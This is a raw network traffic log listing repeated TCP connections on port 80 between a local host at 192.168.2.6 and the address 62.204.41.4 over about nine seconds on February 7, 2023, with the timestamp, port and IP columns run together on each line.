                          Feb 7, 2023 20:02:55.559570074 CET5015080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.618849039 CET805015062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:55.618989944 CET5015080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.619723082 CET805014962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:55.619810104 CET5014980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.620345116 CET5015080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.679759979 CET805015062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:55.682312965 CET805015062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:55.682450056 CET5015080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.794183969 CET5015080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.795253992 CET5015180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.853924990 CET805015062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:55.854134083 CET5015080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.855385065 CET805015162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:55.855612040 CET5015180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.858237982 CET5015180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.918586969 CET805015162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:55.921014071 CET805015162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:55.921159983 CET5015180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.027276993 CET5015180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.028511047 CET5015280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.087835073 CET805015162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:56.088125944 CET5015180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.089051008 CET805015262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:56.089214087 CET5015280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.096465111 CET5015280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.157022953 CET805015262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:56.160877943 CET805015262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:56.161115885 CET5015280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.278738976 CET5015280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.279767036 CET5015380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.339342117 CET805015262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:56.340310097 CET805015362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:56.340497017 CET5015280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.340574980 CET5015380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.341247082 CET5015380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.401758909 CET805015362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:56.404689074 CET805015362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:56.406274080 CET5015380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.512402058 CET5015380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.513190031 CET5015480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.573174000 CET805015362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:56.573388100 CET805015462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:56.573554039 CET5015380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.573637962 CET5015480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.574090004 CET5015480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.634325981 CET805015462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:56.637090921 CET805015462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:56.640922070 CET5015480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.747147083 CET5015480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.748086929 CET5015580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.807543993 CET805015462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:56.807688951 CET5015480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.808475971 CET805015562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:56.812674046 CET5015580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.813184023 CET5015580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.873507023 CET805015562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:56.876737118 CET805015562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:56.876878023 CET5015580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.980748892 CET5015580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:56.981868982 CET5015680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.041325092 CET805015562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.041414022 CET5015580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.043267965 CET805015662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.043524981 CET5015680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.043867111 CET5015680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.105758905 CET805015662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.110049009 CET805015662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.110312939 CET5015680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.220590115 CET5015680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.221513033 CET5015780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.282505989 CET805015662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.282758951 CET5015680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.283260107 CET805015762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.283508062 CET5015780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.285145044 CET5015780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.346715927 CET805015762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.349086046 CET805015762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.349319935 CET5015780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.465648890 CET5015780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.466737032 CET5015880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.527352095 CET805015762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.527535915 CET5015780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.528611898 CET805015862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.528846025 CET5015880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.529246092 CET5015880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.591032028 CET805015862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.593482971 CET805015862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.593607903 CET5015880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.702264071 CET5015880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.703207970 CET5015980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.763694048 CET805015962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.763969898 CET5015980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.763983011 CET805015862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.764086008 CET5015880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.764940977 CET5015980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.825328112 CET805015962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.828329086 CET805015962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.828535080 CET5015980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.935323954 CET5015980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.937870026 CET5016080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.995850086 CET805015962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.996088028 CET5015980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:57.999315977 CET805016062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:57.999531984 CET5016080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.000083923 CET5016080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.062225103 CET805016062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:58.066256046 CET805016062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:58.066487074 CET5016080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.184185982 CET5016080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.185184002 CET5016180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.249742985 CET805016162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:58.249902964 CET5016180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.250171900 CET805016062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:58.250267029 CET5016080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.254041910 CET5016180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.315902948 CET805016162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:58.319019079 CET805016162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:58.319219112 CET5016180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.433698893 CET5016180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.434649944 CET5016280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.494515896 CET805016162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:58.494748116 CET5016180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.495158911 CET805016262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:58.495287895 CET5016280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.501955032 CET5016280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.562575102 CET805016262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:58.565460920 CET805016262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:58.565583944 CET5016280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.670959949 CET5016280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.671823978 CET5016380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.731852055 CET805016262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:58.732028008 CET5016280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.734479904 CET805016362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:58.734616995 CET5016380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.736660957 CET5016380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.799388885 CET805016362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:58.802519083 CET805016362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:58.802664995 CET5016380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.920202971 CET5016380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.923142910 CET5016480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.983089924 CET805016362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:58.983258963 CET5016380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.984085083 CET805016462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:58.984888077 CET5016480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:58.984888077 CET5016480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.046638012 CET805016462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:59.050481081 CET805016462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:59.050657034 CET5016480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.168243885 CET5016480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.169023037 CET5016580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.231599092 CET805016462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:59.231750965 CET5016480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.232784033 CET805016562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:59.233381987 CET5016580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.233845949 CET5016580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.295523882 CET805016562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:59.298787117 CET805016562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:59.298873901 CET5016580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.405497074 CET5016580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.406287909 CET5016680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.467511892 CET805016662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:59.468286991 CET805016562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:59.468552113 CET5016580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.470453978 CET5016680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.478158951 CET5016680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.538414955 CET805016662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:59.541083097 CET805016662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:59.541277885 CET5016680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.653224945 CET5016680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.654114962 CET5016780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.713572025 CET805016662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:59.714256048 CET5016680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.714682102 CET805016762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:59.714839935 CET5016780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.715668917 CET5016780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.776233912 CET805016762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:59.780316114 CET805016762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:59.781012058 CET5016780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.888192892 CET5016780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.889338017 CET5016880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.949079037 CET805016762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:59.949757099 CET5016780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.951905966 CET805016862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:59.952742100 CET5016880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:59.953138113 CET5016880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.016402960 CET805016862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.018917084 CET805016862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.021369934 CET5016880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.137029886 CET5016880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.137938023 CET5016980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.199734926 CET805016862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.199830055 CET805016962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.199984074 CET5016880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.200197935 CET5016980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.200664997 CET5016980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.262171984 CET805016962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.265571117 CET805016962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.265811920 CET5016980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.371390104 CET5016980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.372217894 CET5017080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.431685925 CET805017062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.431952953 CET5017080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.433370113 CET805016962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.433374882 CET5017080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.433516026 CET5016980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.492687941 CET805017062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.494765043 CET805017062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.495074987 CET5017080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.606518984 CET5017080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.607750893 CET5017180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.667592049 CET805017062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.667737961 CET5017080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.670542955 CET805017162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.670744896 CET5017180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.685944080 CET5017180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.747235060 CET805017162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.749867916 CET805017162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.749964952 CET5017180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.860202074 CET5017280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.861685038 CET5017180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.920701981 CET805017262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.920905113 CET5017280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.921461105 CET5017280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.924335957 CET805017162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.925479889 CET5017180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:00.982928991 CET805017262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.986504078 CET805017262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:00.986592054 CET5017280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.090564966 CET5017280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.092873096 CET5017380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.151159048 CET805017262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:01.151403904 CET5017280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.154570103 CET805017362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:01.154815912 CET5017380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.155358076 CET5017380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.216592073 CET805017362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:01.220072985 CET805017362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:01.220277071 CET5017380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.347496986 CET5017380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.348814011 CET5017480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.408858061 CET805017362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:01.409086943 CET805017462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:01.409100056 CET5017380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.409425020 CET5017480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.410758972 CET5017480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.471216917 CET805017462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:01.474220991 CET805017462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:01.474591970 CET5017480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.592238903 CET5017580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.594662905 CET5017480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.653049946 CET805017562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:01.653232098 CET5017580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.654982090 CET805017462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:01.656032085 CET5017480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.662458897 CET5017580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.724780083 CET805017562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:01.726902008 CET805017562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:01.727015018 CET5017580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.845309973 CET5017580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.846138954 CET5017680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.906229973 CET805017562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:01.906416893 CET5017580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.908211946 CET805017662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:01.908330917 CET5017680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.908838034 CET5017680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:01.971107006 CET805017662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:01.974292994 CET805017662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:01.974396944 CET5017680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.096676111 CET5017680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.097387075 CET5017780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.161751986 CET805017762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:02.162044048 CET5017780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.162384987 CET805017662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:02.162503958 CET5017680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.166311026 CET5017780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.227816105 CET805017762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:02.231512070 CET805017762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:02.231678963 CET5017780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.339818001 CET5017780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.340759039 CET5017880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.400065899 CET805017862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:02.400198936 CET5017880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.400607109 CET5017880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.401417971 CET805017762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:02.401563883 CET5017780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.459775925 CET805017862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:02.463025093 CET805017862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:02.463186979 CET5017880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.575812101 CET5017880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.576808929 CET5017980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.635293961 CET805017862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:02.635536909 CET5017880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.638233900 CET805017962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:02.638370991 CET5017980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.638946056 CET5017980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.700210094 CET805017962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:02.702853918 CET805017962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:02.702985048 CET5017980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.808841944 CET5017980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.809510946 CET5018080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.870665073 CET805017962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:02.870881081 CET5017980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.870965958 CET805018062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:02.871129036 CET5018080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.871685982 CET5018080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:02.934752941 CET805018062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:02.937747002 CET805018062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:02.937849045 CET5018080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.075793982 CET5018080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.076895952 CET5018280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.136383057 CET805018262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:03.136567116 CET5018280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.137140036 CET805018062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:03.137172937 CET5018280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.137248039 CET5018080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.196531057 CET805018262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:03.200685024 CET805018262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:03.200874090 CET5018280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.309448004 CET5018280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.312230110 CET5018380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.369226933 CET805018262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:03.369539976 CET5018280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.373878002 CET805018362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:03.374149084 CET5018380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.375286102 CET5018380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.436829090 CET805018362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:03.439560890 CET805018362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:03.439795971 CET5018380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.543530941 CET5018380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.545113087 CET5018480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.605237007 CET805018362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:03.605427027 CET805018462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:03.605555058 CET5018380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.606195927 CET5018480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.616189957 CET5018480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.678570986 CET805018462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:03.680015087 CET805018462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:03.683300018 CET5018480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.793230057 CET5018480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.794128895 CET5018580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.853777885 CET805018462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:03.854510069 CET805018562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:03.854753017 CET5018480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.854794979 CET5018580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.865291119 CET5018580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:03.925787926 CET805018562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:03.927962065 CET805018562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:03.930979013 CET5018580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.044531107 CET5018580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.045394897 CET5018680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.105473995 CET805018562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:04.106585026 CET805018662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:04.106770039 CET5018580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.106791973 CET5018680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.107235909 CET5018680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.168499947 CET805018662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:04.172255039 CET805018662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:04.172326088 CET5018680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.278351068 CET5018680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.279221058 CET5018780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.339767933 CET805018662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:04.339806080 CET805018762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:04.340004921 CET5018680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:04.340032101 CET5018780192.168.2.662.204.41.4
